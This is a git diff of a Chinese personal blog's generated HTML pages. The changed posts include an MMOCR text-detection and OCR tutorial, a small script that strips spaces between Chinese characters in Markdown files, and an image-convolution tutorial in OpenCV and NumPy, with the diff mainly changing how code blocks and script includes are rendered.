    ​ 下载 https://download.openmmlab.com/mmocr/textdet/textsnake/textsnake_resnet50-oclip_fpn-unet_1200e_ctw1500/textsnake_resnet50-oclip_fpn-unet_1200e_ctw1500_20221101_134814-a216e5b2.pth 并放到合适位置,使用 rec_weights 设定模型位置(如果没有设定,则它会自动下载到一个地方)

    -
    infer = MMOCRInferencer(det='textsnake', det_weights='./models/textsnake_resnet50-oclip_fpn-unet_1200e_ctw1500_20221101_134814-a216e5b2.pth')
    +
    1
    infer = MMOCRInferencer(det='textsnake', det_weights='./models/textsnake_resnet50-oclip_fpn-unet_1200e_ctw1500_20221101_134814-a216e5b2.pth')

    ​ 载入预测图像,就决定是你了:

    jpg

    -
    img_path = './demo/HBU.jpg'
    img_bgr = cv2.imread(img_path)
    plt.imshow(img_bgr[:,:,::-1])
    plt.show()
    +
    1
    2
    3
    4
    img_path = './demo/HBU.jpg'
    img_bgr = cv2.imread(img_path)
    plt.imshow(img_bgr[:,:,::-1])
    plt.show()

    png

    ​ 执行预测:

    -
    result = infer(img_path, return_vis=True)
    +
    1
    result = infer(img_path, return_vis=True)

    ​ 解析预测结果-文字区域及置信度:

    -
    result.keys()
    -
    dict_keys(['predictions', 'visualization'])
    +
    1
    result.keys()
    +
    1
    dict_keys(['predictions', 'visualization'])

    ​ 解析预测结果-文字区域可视化:

    -
    plt.imshow(result['visualization'][0])
    plt.show()
    +
    1
    2
    plt.imshow(result['visualization'][0])
    plt.show()

    png


    ​ 也可自行加载配置文件(Method)和对应的模型(Model):

    ​ 从这里下载:文本检测模型 — MMOCR 1.0.1 文档

    -
    infer = MMOCRInferencer(det='./configs/textdet/dbnet/dbnet_resnet18_fpnc_1200e_totaltext.py', det_weights='./models/dbnet_resnet18_fpnc_1200e_totaltext-3ed3233c.pth')
    -
    Loads checkpoint by local backend from path: ./models/dbnet_resnet18_fpnc_1200e_totaltext-3ed3233c.pth
    +
    1
    infer = MMOCRInferencer(det='./configs/textdet/dbnet/dbnet_resnet18_fpnc_1200e_totaltext.py', det_weights='./models/dbnet_resnet18_fpnc_1200e_totaltext-3ed3233c.pth')
    +
    1
    Loads checkpoint by local backend from path: ./models/dbnet_resnet18_fpnc_1200e_totaltext-3ed3233c.pth

    ​ 预测结果虽然是长方形,但是似乎是检测到了弯曲文本,长方形是经过处理后得到的:

    png


    ​ 像如下模型:

    -
    infer = MMOCRInferencer(det='dbnet')
    -
    Loads checkpoint by http backend from path: https://download.openmmlab.com/mmocr/textdet/dbnet/dbnet_resnet50-oclip_1200e_icdar2015/dbnet_resnet50-oclip_1200e_icdar2015_20221102_115917-bde8c87a.pth
    +
    1
    infer = MMOCRInferencer(det='dbnet')
    +
    1
    Loads checkpoint by http backend from path: https://download.openmmlab.com/mmocr/textdet/dbnet/dbnet_resnet50-oclip_1200e_icdar2015/dbnet_resnet50-oclip_1200e_icdar2015_20221102_115917-bde8c87a.pth

    ​ 对于弯曲文本,则检测失败:

    png

    B3 预训练模型预测-端到端 OCR

    ​ 相当于对一张图片先进行场景文本检测,再进行场景文本识别

    ​ 导入工具包:

    -
    from mmocr.apis import MMOCRInferencer

    import cv2
    import numpy as np

    import matplotlib.pyplot as plt
    %matplotlib inline
    +
    1
    2
    3
    4
    5
    6
    7
    from mmocr.apis import MMOCRInferencer

    import cv2
    import numpy as np

    import matplotlib.pyplot as plt
    %matplotlib inline

    ​ 载入场景文本检测模型:DBNet 以及场景文本识别模型:svtr-small

    -
    infer = MMOCRInferencer(det='./configs/textdet/dbnet/dbnet_resnet18_fpnc_1200e_totaltext.py',
    det_weights='./models/dbnet_resnet18_fpnc_1200e_totaltext-3ed3233c.pth',
    rec='svtr-small')
    +
    1
    2
    3
    infer = MMOCRInferencer(det='./configs/textdet/dbnet/dbnet_resnet18_fpnc_1200e_totaltext.py',
    det_weights='./models/dbnet_resnet18_fpnc_1200e_totaltext-3ed3233c.pth',
    rec='svtr-small')

    ​ 载入预测图像,就决定是你了:

    jpg

    -
    img_path = './demo/TJ.jpg'
    img_bgr = cv2.imread(img_path)
    plt.imshow(img_bgr[:,:,::-1])
    plt.show()
    +
    1
    2
    3
    4
    img_path = './demo/TJ.jpg'
    img_bgr = cv2.imread(img_path)
    plt.imshow(img_bgr[:,:,::-1])
    plt.show()

    png

    ​ 执行预测并获得结果:

    -
    result = infer(img_path, save_vis=True, return_vis=True)
    -
    result['predictions']
    -
    [{'rec_texts': ['scotland<UKN>s',
    'cotland<UKN>s',
    'scotland<UKN>s',
    'cadenhead<UKN>s',
    'cadenhead<UKN>s',
    'cadenhead<UKN>s',
    'cadenhead<UKN>s',
    'shop',
    'whisky',
    'cadenhead',
    'style<UKN>',
    '<UKN>town',
    'italian'],
    'rec_scores': [0.977949458360672,
    ...
    0.9994089433125087],
    'det_polygons': [[759.0371750764526,
    505.635521930197,
    759.5478147298675,
    494.91445790166443,
    809.203618756371,
    497.2781902810802,
    808.6929791029562,
    507.99925430961275],
    ...
    [228.83700465086648,
    339.75968070652175,
    231.53506466615698,
    289.6377231763757,
    546.131936480632,
    306.560987389606,
    543.4338764653415,
    356.6829250169837]],
    'det_scores': [0.579411506652832,
    ...
    0.8963190913200378]}]
    +
    1
    result = infer(img_path, save_vis=True, return_vis=True)
    +
    1
    result['predictions']
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    [{'rec_texts': ['scotland<UKN>s',
    'cotland<UKN>s',
    'scotland<UKN>s',
    'cadenhead<UKN>s',
    'cadenhead<UKN>s',
    'cadenhead<UKN>s',
    'cadenhead<UKN>s',
    'shop',
    'whisky',
    'cadenhead',
    'style<UKN>',
    '<UKN>town',
    'italian'],
    'rec_scores': [0.977949458360672,
    ...
    0.9994089433125087],
    'det_polygons': [[759.0371750764526,
    505.635521930197,
    759.5478147298675,
    494.91445790166443,
    809.203618756371,
    497.2781902810802,
    808.6929791029562,
    507.99925430961275],
    ...
    [228.83700465086648,
    339.75968070652175,
    231.53506466615698,
    289.6377231763757,
    546.131936480632,
    306.560987389606,
    543.4338764653415,
    356.6829250169837]],
    'det_scores': [0.579411506652832,
    ...
    0.8963190913200378]}]

    ​ 得到了文本实例、文本范围以及相应的置信度。

    ​ 可视化 OCR 结果(可以从 results/vis/ 文件夹下看到):

    jpg

    ​ 直接本地保存!

    -
    import numpy as np
    from PIL import Image

    Image.fromarray(result['visualization'][0]).save('output_image.png')
    +
    1
    2
    3
    4
    import numpy as np
    from PIL import Image

    Image.fromarray(result['visualization'][0]).save('output_image.png')

    B4 预训练模型预测-OCR 下游任务之 KIE

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    train_pipeline = [
    dict(type='LoadImageFromFile', color_type='color_ignore_orientation'),
    dict(
    type='LoadOCRAnnotations',
    with_polygon=True,
    with_bbox=True,
    with_label=True,
    ),
    dict(type='FixInvalidPolygon', min_poly_points=4),
    dict(
    type='TorchVisionWrapper',
    op='ColorJitter',
    brightness=32.0 / 255,
    saturation=0.5),
    dict(
    type='ImgAugWrapper',
    args=[['Fliplr', 0.5],
    dict(cls='Affine', rotate=[-10, 10]), ['Resize', [0.5, 3.0]]]),
    dict(type='RandomCrop', min_side_ratio=0.1),
    dict(type='Resize', scale=(640, 640), keep_ratio=True),
    dict(type='Pad', size=(640, 640)),
    dict(
    type='PackTextDetInputs',
    meta_keys=('img_path', 'ori_shape', 'img_shape'))
    ]
    • train_pipeline 定义了一系列处理步骤,用于训练数据的预处理:

      @@ -800,7 +798,7 @@

      test_pipeline = [
      dict(type='LoadImageFromFile', color_type='color_ignore_orientation'),
      dict(type='Resize', scale=(1333, 736), keep_ratio=True),
      dict(
      type='LoadOCRAnnotations',
      with_polygon=True,
      with_bbox=True,
      with_label=True,
      ),
      dict(type='FixInvalidPolygon', min_poly_points=4),
      dict(
      type='PackTextDetInputs',
      meta_keys=('img_path', 'ori_shape', 'img_shape', 'scale_factor'))
      ]
      +

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    test_pipeline = [
    dict(type='LoadImageFromFile', color_type='color_ignore_orientation'),
    dict(type='Resize', scale=(1333, 736), keep_ratio=True),
    dict(
    type='LoadOCRAnnotations',
    with_polygon=True,
    with_bbox=True,
    with_label=True,
    ),
    dict(type='FixInvalidPolygon', min_poly_points=4),
    dict(
    type='PackTextDetInputs',
    meta_keys=('img_path', 'ori_shape', 'img_shape', 'scale_factor'))
    ]
    • test_pipelinetrain_pipeline 类似,但针对测试阶段进行了调整:

      @@ -813,10 +811,10 @@

      # dataset settings
      totaltext_textdet_train = _base_.totaltext_textdet_train
      totaltext_textdet_test = _base_.totaltext_textdet_test
      totaltext_textdet_train.pipeline = train_pipeline
      totaltext_textdet_test.pipeline = test_pipeline
      +

    1
    2
    3
    4
    5
    # dataset settings
    totaltext_textdet_train = _base_.totaltext_textdet_train
    totaltext_textdet_test = _base_.totaltext_textdet_test
    totaltext_textdet_train.pipeline = train_pipeline
    totaltext_textdet_test.pipeline = test_pipeline
    • 从基础配置中获取训练和测试数据集,并为它们指定相应的处理管道。
    • -
    train_dataloader = dict(
    batch_size=16,
    num_workers=16,
    pin_memory=True,
    persistent_workers=True,
    sampler=dict(type='DefaultSampler', shuffle=True),
    dataset=totaltext_textdet_train)

    val_dataloader = dict(
    batch_size=1,
    num_workers=1,
    pin_memory=True,
    persistent_workers=True,
    sampler=dict(type='DefaultSampler', shuffle=False),
    dataset=totaltext_textdet_test)

    test_dataloader = val_dataloader
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    train_dataloader = dict(
    batch_size=16,
    num_workers=16,
    pin_memory=True,
    persistent_workers=True,
    sampler=dict(type='DefaultSampler', shuffle=True),
    dataset=totaltext_textdet_train)

    val_dataloader = dict(
    batch_size=1,
    num_workers=1,
    pin_memory=True,
    persistent_workers=True,
    sampler=dict(type='DefaultSampler', shuffle=False),
    dataset=totaltext_textdet_test)

    test_dataloader = val_dataloader
    • train_dataloaderval_dataloader 定义了训练和验证的数据加载器:

      @@ -838,7 +836,7 @@

      auto_scale_lr = dict(base_batch_size=16)
      +

    1
    auto_scale_lr = dict(base_batch_size=16)
    • 配置自动缩放学习率的选项,以便根据基础批次大小动态调整学习率。
    @@ -4724,6 +4722,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/posts/Course-\346\257\225\344\270\232\345\244\247\350\256\272\346\226\207\344\273\216\345\205\245\351\227\250\345\210\260\346\224\276\345\274\203/index.html" "b/posts/Course-\346\257\225\344\270\232\345\244\247\350\256\272\346\226\207\344\273\216\345\205\245\351\227\250\345\210\260\346\224\276\345\274\203/index.html" index 72e61cb14d..5a34bb59f8 100644 --- "a/posts/Course-\346\257\225\344\270\232\345\244\247\350\256\272\346\226\207\344\273\216\345\205\245\351\227\250\345\210\260\346\224\276\345\274\203/index.html" +++ "b/posts/Course-\346\257\225\344\270\232\345\244\247\350\256\272\346\226\207\344\273\216\345\205\245\351\227\250\345\210\260\346\224\276\345\274\203/index.html" @@ -44,8 +44,6 @@ - - @@ -627,6 +625,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/posts/Course-\346\270\270\346\210\217\345\277\203\347\220\206\345\255\246-\344\270\255\345\233\275\344\274\240\345\252\222\345\244\247\345\255\246/index.html" "b/posts/Course-\346\270\270\346\210\217\345\277\203\347\220\206\345\255\246-\344\270\255\345\233\275\344\274\240\345\252\222\345\244\247\345\255\246/index.html" index 01879217d4..e195ace57a 100644 --- "a/posts/Course-\346\270\270\346\210\217\345\277\203\347\220\206\345\255\246-\344\270\255\345\233\275\344\274\240\345\252\222\345\244\247\345\255\246/index.html" +++ "b/posts/Course-\346\270\270\346\210\217\345\277\203\347\220\206\345\255\246-\344\270\255\345\233\275\344\274\240\345\252\222\345\244\247\345\255\246/index.html" @@ -44,8 +44,6 @@ - - @@ -427,7 +425,7 @@

    正文

    其他

    ​ 从官网获取的 PDF 中,不同行之间拷贝下来会留有空格,手动删起来真是太麻烦了!可用下面这段 python 代码一次性移除:

    -
    import os
    import re

    def remove_spaces_between_chinese(text):
    # 正则表达式匹配中文字符之间的空格
    # 其中 u4e00-u9fff 是常见的中文字符 Unicode 范围
    pattern = re.compile(r'([\u4e00-\u9fff])\s+([\u4e00-\u9fff])')
    # 替换匹配到的空格
    return pattern.sub(r'\1\2', text)

    def process_md_files(directory):
    # 遍历文件夹中的所有 .md 文件
    for filename in os.listdir(directory):
    if filename.endswith(".md"):
    file_path = os.path.join(directory, filename)
    with open(file_path, 'r', encoding='utf-8') as file:
    content = file.read()

    # 删除中文字符之间的空格
    updated_content = remove_spaces_between_chinese(content)

    # 如果内容有更新,则写回文件
    if content != updated_content:
    with open(file_path, 'w', encoding='utf-8') as file:
    file.write(updated_content)
    print(f"Processed: {filename}")

    # 指定你要遍历的文件夹路径
    directory_path = "your_directory_path_here"
    process_md_files(directory_path)
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    import os
    import re

    def remove_spaces_between_chinese(text):
    # 正则表达式匹配中文字符之间的空格
    # 其中 u4e00-u9fff 是常见的中文字符 Unicode 范围
    pattern = re.compile(r'([\u4e00-\u9fff])\s+([\u4e00-\u9fff])')
    # 替换匹配到的空格
    return pattern.sub(r'\1\2', text)

    def process_md_files(directory):
    # 遍历文件夹中的所有 .md 文件
    for filename in os.listdir(directory):
    if filename.endswith(".md"):
    file_path = os.path.join(directory, filename)
    with open(file_path, 'r', encoding='utf-8') as file:
    content = file.read()

    # 删除中文字符之间的空格
    updated_content = remove_spaces_between_chinese(content)

    # 如果内容有更新,则写回文件
    if content != updated_content:
    with open(file_path, 'w', encoding='utf-8') as file:
    file.write(updated_content)
    print(f"Processed: {filename}")

    # 指定你要遍历的文件夹路径
    directory_path = "your_directory_path_here"
    process_md_files(directory_path)
    @@ -645,6 +643,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/posts/Course-\346\270\270\346\210\217\345\277\203\347\220\206\345\255\246-\344\270\255\345\233\275\344\274\240\345\252\222\345\244\247\345\255\246/\347\254\254\344\270\200\347\253\240/index.html" "b/posts/Course-\346\270\270\346\210\217\345\277\203\347\220\206\345\255\246-\344\270\255\345\233\275\344\274\240\345\252\222\345\244\247\345\255\246/\347\254\254\344\270\200\347\253\240/index.html" index 8c523a8b68..7d9e3042df 100644 --- "a/posts/Course-\346\270\270\346\210\217\345\277\203\347\220\206\345\255\246-\344\270\255\345\233\275\344\274\240\345\252\222\345\244\247\345\255\246/\347\254\254\344\270\200\347\253\240/index.html" +++ "b/posts/Course-\346\270\270\346\210\217\345\277\203\347\220\206\345\255\246-\344\270\255\345\233\275\344\274\240\345\252\222\345\244\247\345\255\246/\347\254\254\344\270\200\347\253\240/index.html" @@ -44,17 +44,6 @@ - - - - - - - - - - - @@ -819,6 +808,17 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + + + + + + + + + + diff --git "a/posts/Course-\346\270\270\346\210\217\345\277\203\347\220\206\345\255\246-\344\270\255\345\233\275\344\274\240\345\252\222\345\244\247\345\255\246/\347\254\254\344\270\211\347\253\240/index.html" "b/posts/Course-\346\270\270\346\210\217\345\277\203\347\220\206\345\255\246-\344\270\255\345\233\275\344\274\240\345\252\222\345\244\247\345\255\246/\347\254\254\344\270\211\347\253\240/index.html" index e5a8b9f7ae..9e024a0ae2 100644 --- "a/posts/Course-\346\270\270\346\210\217\345\277\203\347\220\206\345\255\246-\344\270\255\345\233\275\344\274\240\345\252\222\345\244\247\345\255\246/\347\254\254\344\270\211\347\253\240/index.html" +++ "b/posts/Course-\346\270\270\346\210\217\345\277\203\347\220\206\345\255\246-\344\270\255\345\233\275\344\274\240\345\252\222\345\244\247\345\255\246/\347\254\254\344\270\211\347\253\240/index.html" @@ -44,17 +44,6 @@ - - - - - - - - - - - @@ -780,6 +769,17 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + + + + + + + + + + diff --git "a/posts/Course-\346\270\270\346\210\217\345\277\203\347\220\206\345\255\246-\344\270\255\345\233\275\344\274\240\345\252\222\345\244\247\345\255\246/\347\254\254\344\272\214\347\253\240/index.html" "b/posts/Course-\346\270\270\346\210\217\345\277\203\347\220\206\345\255\246-\344\270\255\345\233\275\344\274\240\345\252\222\345\244\247\345\255\246/\347\254\254\344\272\214\347\253\240/index.html" index d1d1cc3dde..35efccb514 100644 --- "a/posts/Course-\346\270\270\346\210\217\345\277\203\347\220\206\345\255\246-\344\270\255\345\233\275\344\274\240\345\252\222\345\244\247\345\255\246/\347\254\254\344\272\214\347\253\240/index.html" +++ "b/posts/Course-\346\270\270\346\210\217\345\277\203\347\220\206\345\255\246-\344\270\255\345\233\275\344\274\240\345\252\222\345\244\247\345\255\246/\347\254\254\344\272\214\347\253\240/index.html" @@ -44,17 +44,6 @@ - - - - - - - - - - - @@ -784,6 +773,17 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + + + + + + + + + + diff --git "a/posts/Course-\346\270\270\346\210\217\345\277\203\347\220\206\345\255\246-\344\270\255\345\233\275\344\274\240\345\252\222\345\244\247\345\255\246/\347\254\254\344\272\224\347\253\240/index.html" "b/posts/Course-\346\270\270\346\210\217\345\277\203\347\220\206\345\255\246-\344\270\255\345\233\275\344\274\240\345\252\222\345\244\247\345\255\246/\347\254\254\344\272\224\347\253\240/index.html" index 23c0f4092a..d4e64bea6d 100644 --- "a/posts/Course-\346\270\270\346\210\217\345\277\203\347\220\206\345\255\246-\344\270\255\345\233\275\344\274\240\345\252\222\345\244\247\345\255\246/\347\254\254\344\272\224\347\253\240/index.html" +++ "b/posts/Course-\346\270\270\346\210\217\345\277\203\347\220\206\345\255\246-\344\270\255\345\233\275\344\274\240\345\252\222\345\244\247\345\255\246/\347\254\254\344\272\224\347\253\240/index.html" @@ -44,17 +44,6 @@ - - - - - - - - - - - @@ -742,6 +731,17 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + + + + + + + + + + diff --git "a/posts/Course-\346\270\270\346\210\217\345\277\203\347\220\206\345\255\246-\344\270\255\345\233\275\344\274\240\345\252\222\345\244\247\345\255\246/\347\254\254\345\205\255\347\253\240/index.html" "b/posts/Course-\346\270\270\346\210\217\345\277\203\347\220\206\345\255\246-\344\270\255\345\233\275\344\274\240\345\252\222\345\244\247\345\255\246/\347\254\254\345\205\255\347\253\240/index.html" index 7e7379b6b2..17df57515d 100644 --- "a/posts/Course-\346\270\270\346\210\217\345\277\203\347\220\206\345\255\246-\344\270\255\345\233\275\344\274\240\345\252\222\345\244\247\345\255\246/\347\254\254\345\205\255\347\253\240/index.html" +++ "b/posts/Course-\346\270\270\346\210\217\345\277\203\347\220\206\345\255\246-\344\270\255\345\233\275\344\274\240\345\252\222\345\244\247\345\255\246/\347\254\254\345\205\255\347\253\240/index.html" @@ -44,17 +44,6 @@ - - - - - - - - - - - @@ -865,6 +854,17 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + + + + + + + + + + diff --git "a/posts/Course-\346\270\270\346\210\217\345\277\203\347\220\206\345\255\246-\344\270\255\345\233\275\344\274\240\345\252\222\345\244\247\345\255\246/\347\254\254\345\233\233\347\253\240/index.html" "b/posts/Course-\346\270\270\346\210\217\345\277\203\347\220\206\345\255\246-\344\270\255\345\233\275\344\274\240\345\252\222\345\244\247\345\255\246/\347\254\254\345\233\233\347\253\240/index.html" index 2d38f5cc6d..133c04c958 100644 --- "a/posts/Course-\346\270\270\346\210\217\345\277\203\347\220\206\345\255\246-\344\270\255\345\233\275\344\274\240\345\252\222\345\244\247\345\255\246/\347\254\254\345\233\233\347\253\240/index.html" +++ "b/posts/Course-\346\270\270\346\210\217\345\277\203\347\220\206\345\255\246-\344\270\255\345\233\275\344\274\240\345\252\222\345\244\247\345\255\246/\347\254\254\345\233\233\347\253\240/index.html" @@ -44,17 +44,6 @@ - - - - - - - - - - - @@ -773,6 +762,17 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + + + + + + + + + + diff --git "a/posts/Course-\347\210\261\346\203\205\345\277\203\347\220\206\345\255\246-\346\255\246\346\261\211\347\220\206\345\267\245\345\244\247\345\255\246/index.html" "b/posts/Course-\347\210\261\346\203\205\345\277\203\347\220\206\345\255\246-\346\255\246\346\261\211\347\220\206\345\267\245\345\244\247\345\255\246/index.html" index dc91a674bf..5f1de0c637 100644 --- "a/posts/Course-\347\210\261\346\203\205\345\277\203\347\220\206\345\255\246-\346\255\246\346\261\211\347\220\206\345\267\245\345\244\247\345\255\246/index.html" +++ "b/posts/Course-\347\210\261\346\203\205\345\277\203\347\220\206\345\255\246-\346\255\246\346\261\211\347\220\206\345\267\245\345\244\247\345\255\246/index.html" @@ -44,8 +44,6 @@ - - @@ -3447,6 +3445,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/posts/DIP-Convolutions in image processing/index.html b/posts/DIP-Convolutions in image processing/index.html index 301647c0f1..43ee4f0a1d 100644 --- a/posts/DIP-Convolutions in image processing/index.html +++ b/posts/DIP-Convolutions in image processing/index.html @@ -44,8 +44,6 @@ - - @@ -422,17 +420,17 @@

    使相乘后的数据拥有周边数据的一些特征:

    jpg

    在数字图像处理中的应用

    -
    import cv2
    import matplotlib.pyplot as plt
    import numpy as np

    img = cv2.imread('images/tom_in_bowtie.jpg')
    plt.imshow(cv2.cvtColor(img, cv2.COLOR_BGR2RGB))
    +
    1
    2
    3
    4
    5
    6
    import cv2
    import matplotlib.pyplot as plt
    import numpy as np

    img = cv2.imread('images/tom_in_bowtie.jpg')
    plt.imshow(cv2.cvtColor(img, cv2.COLOR_BGR2RGB))
    <matplotlib.image.AxesImage at 0x2a11b90d760>
     

    png

    -
    img.shape
    +
    1
    img.shape
    (500, 399, 3)
     
    -
    def plot(array):
    print(array)
    plt.matshow(array, cmap='Wistia')
    plt.colorbar()
    for x in range(len(array)):
    for y in range(len(array)):
    plt.annotate(round(array[x, y], 3),xy=(x,y),horizontalalignment='center',
    verticalalignment='center')
    return plt
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    def plot(array):
    print(array)
    plt.matshow(array, cmap='Wistia')
    plt.colorbar()
    for x in range(len(array)):
    for y in range(len(array)):
    plt.annotate(round(array[x, y], 3),xy=(x,y),horizontalalignment='center',
    verticalalignment='center')
    return plt

    均值滤波

    jpg

    -
    kernel = np.ones((3, 3)) / 9
    plot(kernel)
    +
    1
    2
    kernel = np.ones((3, 3)) / 9
    plot(kernel)
    [[0.11111111 0.11111111 0.11111111]
      [0.11111111 0.11111111 0.11111111]
      [0.11111111 0.11111111 0.11111111]]
    @@ -442,7 +440,7 @@ 

    <module 'matplotlib.pyplot' from 'C:\\Users\\gzjzx\\anaconda3\\lib\\site-packages\\matplotlib\\pyplot.py'>

    png

    -
    fimg = cv2.filter2D(img, cv2.CV_8UC3, kernel)
    plt.imshow(cv2.cvtColor(fimg, cv2.COLOR_BGR2RGB))
    +
    1
    2
    fimg = cv2.filter2D(img, cv2.CV_8UC3, kernel)
    plt.imshow(cv2.cvtColor(fimg, cv2.COLOR_BGR2RGB))
    <matplotlib.image.AxesImage at 0x2a11c0d0af0>
     

    png

    @@ -460,8 +458,8 @@

    @: python 中定义的矩阵乘法运算符

    -
    def gaussian_kernel_2d(ksize, sigma):
    return cv2.getGaussianKernel(ksize, sigma) @ cv2.getGaussianKernel(ksize,sigma).T
    -
    kernel = gaussian_kernel_2d(7, -1)
    plot(kernel)
    +
    1
    2
    def gaussian_kernel_2d(ksize, sigma):
    return cv2.getGaussianKernel(ksize, sigma) @ cv2.getGaussianKernel(ksize,sigma).T
    +
    1
    2
    kernel = gaussian_kernel_2d(7, -1)
    plot(kernel)
    [[0.00097656 0.00341797 0.00683594 0.00878906 0.00683594 0.00341797
       0.00097656]
      [0.00341797 0.01196289 0.02392578 0.03076172 0.02392578 0.01196289
    @@ -482,21 +480,21 @@ 

    <module 'matplotlib.pyplot' from 'C:\\Users\\gzjzx\\anaconda3\\lib\\site-packages\\matplotlib\\pyplot.py'>

    png

    -
    sum(sum(kernel))
    +
    1
    sum(sum(kernel))
    1.0
     

    应用高斯滤波

    -
    fimg = cv2.filter2D(img, cv2.CV_8UC3, kernel)
    plt.imshow(cv2.cvtColor(fimg, cv2.COLOR_BGR2RGB))
    +
    1
    2
    fimg = cv2.filter2D(img, cv2.CV_8UC3, kernel)
    plt.imshow(cv2.cvtColor(fimg, cv2.COLOR_BGR2RGB))
    <matplotlib.image.AxesImage at 0x1c2abcbef70>
     

    png

    等效于

    -
    fimg = cv2.GaussianBlur(img, (7, 7), -1)
    plt.imshow(cv2.cvtColor(fimg, cv2.COLOR_BGR2RGB))
    +
    1
    2
    fimg = cv2.GaussianBlur(img, (7, 7), -1)
    plt.imshow(cv2.cvtColor(fimg, cv2.COLOR_BGR2RGB))
    <matplotlib.image.AxesImage at 0x1c2aa6a6910>
     

    png

    锐化

    -
    kernel = np.array([[-0.5, -1.0, -0.5],
    [-1.0, 7.0, -1.0],
    [-0.5, -1.0, -0.5]])
    plot(kernel)
    +
    1
    2
    3
    4
    kernel = np.array([[-0.5, -1.0, -0.5],
    [-1.0, 7.0, -1.0],
    [-0.5, -1.0, -0.5]])
    plot(kernel)
    [[-0.5 -1.  -0.5]
      [-1.   7.  -1. ]
      [-0.5 -1.  -0.5]]
    @@ -515,16 +513,16 @@ 

    锐化

    <module 'matplotlib.pyplot' from 'C:\\Users\\gzjzx\\anaconda3\\lib\\site-packages\\matplotlib\\pyplot.py'>

    png

    -
    sum(sum(kernel))
    +
    1
    sum(sum(kernel))
    1.0
     
    -
    fimg = cv2.filter2D(img, cv2.CV_8UC3, kernel)
    plt.imshow(cv2.cvtColor(fimg, cv2.COLOR_BGR2RGB))
    +
    1
    2
    fimg = cv2.filter2D(img, cv2.CV_8UC3, kernel)
    plt.imshow(cv2.cvtColor(fimg, cv2.COLOR_BGR2RGB))
    <matplotlib.image.AxesImage at 0x1c2a9376fd0>
     

    png

    边缘检测

    jpg

    -
    # 我也不知道这里为什么第二行显示的都是 0.0...
    kernel = np.array([[-0.125, 0.0, 0.125],
    [-0.25, 0.0, 0.25],
    [-0.125, 0.0, 0.125]])
    plot(kernel)
    +
    1
    2
    3
    4
    5
    # 我也不知道这里为什么第二行显示的都是 0.0...
    kernel = np.array([[-0.125, 0.0, 0.125],
    [-0.25, 0.0, 0.25],
    [-0.125, 0.0, 0.125]])
    plot(kernel)
    [[-0.125  0.     0.125]
      [-0.25   0.     0.25 ]
      [-0.125  0.     0.125]]
    @@ -534,10 +532,10 @@ 

    <module 'matplotlib.pyplot' from 'C:\\Users\\gzjzx\\anaconda3\\lib\\site-packages\\matplotlib\\pyplot.py'>

    jpg

    -
    sum(sum(kernel))
    +
    1
    sum(sum(kernel))
    0.0
     
    -
    fimg = cv2.filter2D(img, cv2.CV_8UC3, kernel)
    plt.imshow(4 * cv2.cvtColor(fimg, cv2.COLOR_BGR2RGB)) # 太黑了,我乘个 4
    +
    1
    2
    fimg = cv2.filter2D(img, cv2.CV_8UC3, kernel)
    plt.imshow(4 * cv2.cvtColor(fimg, cv2.COLOR_BGR2RGB)) # 太黑了,我乘个 4
    <matplotlib.image.AxesImage at 0x2a11c124520>
     

    png

    @@ -549,30 +547,30 @@

    But what is the Fourier Transform? A visual introduction. - YouTube

    就是说卷积运算使用了太多的乘法,运用 FFT 算法的思想会加速运算?

    -
    import numpy as np

    arr1 = np.random.random(100000)
    arr2 = np.random.random(100000)
    -
    %%timeit
    np.convolve(arr1, arr2)
    +
    1
    2
    3
    4
    import numpy as np

    arr1 = np.random.random(100000)
    arr2 = np.random.random(100000)
    +
    1
    2
    %%timeit
    np.convolve(arr1, arr2)
    1.66s ± 341ms per loop (mean ± std. dev. of 7 runs, 1 loop each)
     
    -
    import scipy.signal
    -
    %%timeit
    scipy.signal.fftconvolve(arr1, arr2)
    +
    1
    import scipy.signal
    +
    1
    2
    %%timeit
    scipy.signal.fftconvolve(arr1, arr2)
    10.8ms ± 1.24ms per loop (mean ± std. dev. of 7 runs, 100 loops each)
     

    定义法

    -
    def conv(a, b):
    N = len(a)
    M = len(b)
    YN = N + M - 1
    y = [0.0 for i in range(YN)]
    for n in range(YN):
    for m in range(M):
    if 0 <= n - m and n - m < N:
    y[n] += a[n - m] * b[m]
    return y
    -
    conv((1, 2, 3), (4, 5, 6))
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    def conv(a, b):
    N = len(a)
    M = len(b)
    YN = N + M - 1
    y = [0.0 for i in range(YN)]
    for n in range(YN):
    for m in range(M):
    if 0 <= n - m and n - m < N:
    y[n] += a[n - m] * b[m]
    return y
    +
    1
    conv((1, 2, 3), (4, 5, 6))
    [4.0, 13.0, 28.0, 27.0, 18.0]
     

    使用 numpy 库

    -
    import numpy as np

    np.convolve((1, 2, 3), (4, 5, 6))
    +
    1
    2
    3
    import numpy as np

    np.convolve((1, 2, 3), (4, 5, 6))
    array([ 4, 13, 28, 27, 18])
     

    FFT 快速卷积

    -
    def convfft(a, b):
    N = len(a)
    M = len(b)
    YN = N + M - 1
    FFT_N = 2 ** (int(np.log2(YN)) + 1)
    afft = np.fft.fft(a, FFT_N)
    bfft = np.fft.fft(b, FFT_N)
    abfft = afft * bfft
